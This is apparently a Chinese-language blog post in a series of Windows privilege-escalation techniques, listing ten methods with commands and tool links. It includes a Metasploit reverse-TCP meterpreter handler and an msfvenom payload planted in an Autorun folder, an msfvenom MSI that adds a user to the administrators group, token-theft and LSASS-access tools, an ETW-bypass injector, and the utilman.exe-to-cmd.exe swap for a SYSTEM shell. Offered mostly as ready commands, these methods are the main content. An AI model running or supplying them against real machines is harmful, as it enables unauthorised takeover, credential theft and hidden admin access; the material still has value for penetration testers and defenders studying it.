特权升级的危险是显而易见的。通过提升权限,攻击者可以绕过网络安全措施,从而损害数据完整性、机密性和系统可用性。对于组织而言,这可能会导致数据泄露、系统停机以及潜在的法律和声誉后果。识别权限升级的迹象并部署预防性网络安全措施对于保护数字资产并确保只有授权人员才能访问关键系统功能至关重要。
主要有两种类型:垂直升级和水平升级。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。这使得他们能够访问受限区域、修改系统配置,甚至部署恶意软件。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。
截至目前,我们一共分享了29种提权方法,本期我们继续整理了10种热门提权方式,本期分享完后,我们一共分享了39种方法离100种方法也快完在1/3了,继续查收哟,:
1.Abusing Services via Autorun
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
In Metasploit (msf > prompt) 类型:use multi/handler
In Metasploit (msf > prompt) 类型:set payload windows/meterpreter/reverse_tcp
In Metasploit (msf > prompt) 类型:set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) 类型:run
打开另一个命令提示符并键入:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
program.exe 放在 ‘C:\Program Files\Autorun Program’.
2.Abusing Services via AlwaysInstallElevated
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
msfvenom -p windows/exec CMD=‘net localgroup administrators user /add’ -f msi-nouac -o setup.msi
msiexec /quiet /qn /i C:\Temp\setup.msi
Or
SharpUp.exe AlwaysInstallElevated
批注:sharpup链接https://github.com/GhostPack/SharpUp
3.Abusing Services via SeCreateToken
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
!rmpriv
4.Abusing Services via SeDebug
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
Conjure-LSASS
Or
syscall_enable_priv 20
5.Remote Process via Syscalls (HellsGate|Hal操作系统Gate)
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
injectEtwBypass pid
批注:https://github.com/boku7/injectEtwBypass
6.Escalate With DuplicateTokenEx
域:Yes
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
PrimaryTokenTheft.exe pid
Or
TokenPlaye.exe –impersonate –pid pid
批注:
primarytokenthenft:https://github.com/slyd0g/PrimaryTokenTheft
tokenplaye:https://github.com/S1ckB0y1337/TokenPlayer/releases/tag/v0.8
7.Abusing Services via SeIncreaseBasePriority
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
start /realtime SomeCpuIntensiveApp.exe
批注:
找了一圈,只有这儿有相关内容:https://github.com/gtworek/Priv2Admin
8.Abusing Services via SeManageVolume
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
只需编译并运行SeManageVolumeAbuse
批注:https://github.com/xct/SeManageVolumeAbuse
9.Abusing Services via SeRelabel
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
WRITE_OWNER对资源的访问权限,包括文件和文件夹。
Run for privilege escalation
10.Abusing Services via SeRestore
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
启动具有 SeRestore 权限的 PowerShell/ISE.
使用Enable-SeRestorePrivilege 启用权限.
将utilman.exe重命名为utilman.old
将cmd.exe重命名为utilman.exe
锁定控制台并按Win+U